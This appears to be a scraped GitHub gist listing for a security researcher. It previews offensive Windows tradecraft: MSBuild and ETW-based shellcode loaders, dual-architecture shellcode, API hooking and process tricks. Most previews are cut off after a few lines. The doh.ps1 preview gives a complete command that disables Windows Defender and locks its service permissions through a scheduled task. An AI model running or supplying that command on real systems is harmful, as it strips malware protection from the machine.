Skip to content

Instantly share code, notes, and snippets.

View TheWover's full-sized avatar

TheWover

1.1k followers · 50 following
View GitHub Profile
@TheWover
TheWover / gist:9955d2543197089760f72934e98baaf7
Created September 22, 2022 17:19
MSBuild Property Functions - Load RWX Memory Mapped File
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@TheWover
TheWover / gist:631ea8b25c6ae4090522eb4d17dc20fc
Created September 22, 2022 17:19
MSBuild Property Functions - Load RWX Memory Mapped File
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@TheWover
TheWover / type.cs
Created February 11, 2022 15:55
Experiments - Event ID 007: No Image loaded Event
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
@TheWover
TheWover / process_list_without_handles.cpp
Created June 2, 2021 21:03 — forked from lpBunny/process_list_without_handles.cpp
List process information including process architecture and username without opening any handles
/*
*
* List process information on windows without opening any handles, including process architecture and username
*
*/
#include <Windows.h>
#include <stdio.h>
#include <math.h>
@TheWover
TheWover / nukefile.cs
Created May 18, 2021 19:00
Schedule a file for deletion on reboot. Lets you delete locked files and stuff in System32.
using System;
namespace NukeFile
{
class Program
{
///
/// Consts defined in WINBASE.H
///
[Flags]
@TheWover
TheWover / x96shell_msgbox.asm
Created May 7, 2021 18:17 — forked from aaaddress1/x96shell_msgbox.asm
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
; x96 shellcode (x32+x64) by aaaddress1@chroot.org
; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm
section .text
bits 32
_main:
call entry
entry:
mov ax, cs
sub ax, 0x23
jz retTo32b
@TheWover
TheWover / winfork.c
Created July 10, 2020 01:02 — forked from juntalis/winfork.c
/*
* fork.c
* Experimental fork() on Windows. Requires NT 6 subsystem or
* newer.
*
* Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
@TheWover
TheWover / doh.ps1
Created May 7, 2020 03:39 — forked from tyranid/doh.ps1
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@TheWover
TheWover / EtwpTest.cs
Created May 6, 2020 22:03
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@TheWover
TheWover / win32_hook.h
Created April 7, 2020 01:17 — forked from ghorsington/win32_hook.h
EAT and IAT hook
/*
* EAT-based hooking for x86/x64.
*
* Big thanks to ez (https://github.com/ezdiy/) for making this!
*
* Creates "hooks" by modifying the module's export address table.
* The procedure works in three main parts:
*
* 1. Reading the module's PE file and getting all exported functions.
* 2. Finding the right function to "hook" by simple address lookup